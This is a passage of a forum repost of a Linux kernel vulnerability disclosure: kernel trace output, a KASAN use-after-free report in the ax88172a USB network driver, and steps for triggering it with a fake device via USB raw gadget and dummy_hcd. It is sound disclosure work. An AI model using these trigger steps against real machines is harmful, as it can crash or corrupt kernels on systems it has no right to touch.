[  149.343573]  ? kobject_put+0x91/0x1d0
[  149.344307]  usb_disable_device+0xc6/0x1e0 [usbcore]
[  149.345056]  usb_disconnect.cold+0x7b/0x24d [usbcore]
[  149.345802]  hub_event+0xc4c/0x1880 [usbcore]
[  149.346571]  ? preempt_count_sub+0x81/0x90
[  149.347313]  process_one_work+0x1e5/0x3b0
[  149.348055]  ? rescuer_thread+0x370/0x370
[  149.348795]  worker_thread+0x50/0x3a0
[  149.349531]  ? rescuer_thread+0x370/0x370
[  149.350292]  kthread+0xe7/0x110
[  149.351030]  ? kthread_complete_and_exit+0x20/0x20
[  149.351771]  ret_from_fork+0x22/0x30
[  149.352504]  </TASK>
[  149.353234] Modules linked in: cdc_ether(E) asix(E) selftests(E) usbnet(E) mii(E) nfnetlink(E) rfkill(E) zstd(E) zstd_compress(E) zram(E) zsmalloc(E) intel_rapl_msr(E) intel_rapl_common(E) x86_pkg_temp_thermal(E) intel_powerclamp(E) coretemp(E) nls_ascii(E) nls_cp437(E) vfat(E) snd_hda_codec_realtek(E) kvm_intel(E) fat(E) snd_hda_codec_generic(E) snd_hda_codec_hdmi(E) ledtrig_audio(E) kvm(E) irqbypass(E) snd_hda_intel(E) crc32_pclmul(E) snd_intel_dspcfg(E) snd_intel_sdw_acpi(E) snd_hda_codec(E) iTCO_wdt(E) intel_pmc_bxt(E) iTCO_vendor_support(E) snd_hda_core(E) at24(E) mei_hdcp(E) watchdog(E) ghash_clmulni_intel(E) snd_hwdep(E) snd_pcm_oss(E) snd_mixer_oss(E) rapl(E) r8169(E) intel_cstate(E) intel_uncore(E) efi_pstore(E) pcspkr(E) realtek(E) snd_pcm(E) mdio_devres(E) i2c_i801(E) snd_timer(E) mei_me(E) i2c_smbus(E) snd(E) ehci_pci(E) sg(E) libphy(E) soundcore(E) ehci_hcd(E) mei(E) lpc_ich(E) button(E) msr(E) parport_pc(E) ppdev(E) parport(E) fuse(E) configfs(E) efivarfs(E) ip_tables(E)
[  149.353267]  x_tables(E) autofs4(E) ext4(E) crc16(E) mbcache(E) jbd2(E) dm_crypt(E) dm_mod(E) raid10(E) raid456(E) libcrc32c(E) crc32c_generic(E) async_raid6_recov(E) async_memcpy(E) async_pq(E) async_xor(E) xor(E) async_tx(E) raid6_pq(E) raid1(E) raid0(E) multipath(E) linear(E) md_mod(E) hid_generic(E) usbhid(E) hid(E) sd_mod(E) t10_pi(E) crc_t10dif(E) crct10dif_generic(E) crct10dif_pclmul(E) crct10dif_common(E) evdev(E) crc32c_intel(E) i915(E) i2c_algo_bit(E) ahci(E) xhci_pci(E) libahci(E) drm_kms_helper(E) xhci_hcd(E) cec(E) rc_core(E) libata(E) ttm(E) aesni_intel(E) crypto_simd(E) usbcore(E) scsi_mod(E) cryptd(E) scsi_common(E) drm(E) usb_common(E) video(E)
[  149.360796] ---[ end trace 0000000000000000 ]---
[  149.362505] ------------[ cut here ]------------


In my test VM with a bunch of kernel debugging enabled, I get this KASAN splat (shown here without guess frames) when I attach the same fake USB device through an emulated HCD:

BUG: KASAN: use-after-free in ax88172a_stop+0xab/0xc0
Read of size 8 at addr ffff88800c684e48 by task kworker/0:2/33

CPU: 0 PID: 33 Comm: kworker/0:2 Not tainted 5.17.0-rc4-00054-gf71077a4d84b #949
Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.15.0-1 04/01/2014
Workqueue: usb_hub_wq hub_event
Call Trace:
 <TASK>
 dump_stack_lvl+0x45/0x59
 print_address_description.constprop.0+0x1f/0x150
 kasan_report.cold+0x7f/0x11b
 ax88172a_stop+0xab/0xc0
 usbnet_stop+0x13d/0x390
 __dev_close_many+0x18c/0x290
 dev_close_many+0x18a/0x3f0
 unregister_netdevice_many+0x2f8/0x1420
 unregister_netdevice_queue+0x1dc/0x280
 unregister_netdev+0x18/0x20
 usbnet_disconnect+0x118/0x260
 usb_unbind_interface+0x182/0x7e0
 __device_release_driver+0x531/0x670
 device_release_driver+0x26/0x40
 bus_remove_device+0x2ae/0x570
 device_del+0x490/0xb50
 usb_disable_device+0x294/0x600
 usb_disconnect.cold+0x1fb/0x68b
 hub_event+0x1472/0x39d0
 process_one_work+0x91d/0x15d0
 worker_thread+0x57b/0x1240
 kthread+0x2a5/0x350
 ret_from_fork+0x22/0x30
 </TASK>

Allocated by task 33:
 kasan_save_stack+0x1e/0x40
 __kasan_kmalloc+0x81/0xa0
 ax88172a_bind+0x95/0x7b0
 usbnet_probe+0xa62/0x2370
 usb_probe_interface+0x27d/0x760
 really_probe+0x475/0xbd0
 __driver_probe_device+0x18f/0x470
 driver_probe_device+0x49/0x120
 __device_attach_driver+0x199/0x250
 bus_for_each_drv+0x125/0x1b0
 __device_attach+0x1e0/0x3d0
 bus_probe_device+0x1a5/0x260
 device_add+0x971/0x1a70
 usb_set_configuration+0x92b/0x1600
 usb_generic_driver_probe+0x79/0xa0
 usb_probe_device+0xab/0x250
 really_probe+0x475/0xbd0
 __driver_probe_device+0x18f/0x470
 driver_probe_device+0x49/0x120
 __device_attach_driver+0x199/0x250
 bus_for_each_drv+0x125/0x1b0
 __device_attach+0x1e0/0x3d0
 bus_probe_device+0x1a5/0x260
 device_add+0x971/0x1a70
 usb_new_device.cold+0x47d/0xb88
 hub_event+0x20c7/0x39d0
 process_one_work+0x91d/0x15d0
 worker_thread+0x57b/0x1240
 kthread+0x2a5/0x350
 ret_from_fork+0x22/0x30

Freed by task 33:
 kasan_save_stack+0x1e/0x40
 kasan_set_track+0x21/0x30
 kasan_set_free_info+0x20/0x30
 __kasan_slab_free+0xe0/0x110
 kfree+0xa5/0x2b0
 usbnet_disconnect+0xe7/0x260
 usb_unbind_interface+0x182/0x7e0
 __device_release_driver+0x531/0x670
 device_release_driver+0x26/0x40
 bus_remove_device+0x2ae/0x570
 device_del+0x490/0xb50
 usb_disable_device+0x294/0x600
 usb_disconnect.cold+0x1fb/0x68b
 hub_event+0x1472/0x39d0
 process_one_work+0x91d/0x15d0
 worker_thread+0x57b/0x1240
 kthread+0x2a5/0x350
 ret_from_fork+0x22/0x30



If you want to test this yourself, you can use the USB raw gadget
(https://www.kernel.org/doc/html/latest/usb/raw-gadget.html)
with dummy_hcd. Compile the attached testcase, then run it as
\"./usb-ax88172a dummy_udc dummy_udc.0\", wait a few seconds for
the device to come up, and press CTRL+C to trigger USB disconnect.
This requires CONFIG_USB_DUMMY_HCD=y and CONFIG_USB_RAW_GADGET=y.




Found by: jannh@google.com

 

 

Source

  • Upvote 2

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.



×
×
  • Create New...